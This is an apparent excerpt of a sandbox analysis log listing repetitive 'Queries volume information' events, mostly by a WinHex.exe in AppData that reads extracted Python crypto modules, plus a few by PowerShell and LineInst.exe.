Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\LineInst.exeQueries volume information: C:\$Windows.~WS\Sources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\LineInst.exeQueries volume information: C:\$Windows.~WS VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd VolumeInformation
Source: C:\Users\user\AppData\WinHex.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformation
